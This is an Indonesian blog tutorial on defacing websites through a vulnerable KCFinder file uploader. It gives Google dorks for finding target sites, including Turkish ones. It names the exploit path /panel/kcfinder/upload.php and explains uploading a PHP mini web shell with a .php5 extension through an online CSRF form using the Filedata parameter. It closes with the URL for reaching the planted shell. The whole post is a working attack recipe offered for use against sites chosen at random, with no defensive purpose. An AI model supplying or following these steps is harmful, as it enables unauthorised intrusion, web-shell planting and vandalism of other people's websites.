tutorial deface poc kcfinder uploader haber

apa sih kcfinder uploader haber? sama aja sih kaya kcfinder biasanya, cuman dorknya upload haber :v

pertama tama siapkan:
- dork: inurl:/uploads/haber
           inurl:/uploads/haber site:tr
- mini shell ext .php5
- csrf online disini atau disini

caranya dorking di google pake dork diatas, pilih salah satu website.
masukan exploit.
exploit: /panel/kcfinder/upload.php
contoh: http://site.com/panel/kcfinder/upload.php

vuln? jika eror berati vuln.



tinggal masukan csrf online, dengan parameter Filedata

-kunci target-

upload mini shell ext .php5

cara akses? site.co.li/panel/kcfinder/upload/files/namashel.php5

mudah bukan??? jangan sungkan kunjungi ini blog yah :)
0 Komentar untuk "tutorial deface poc kcfinder uploader haber"

Back To Top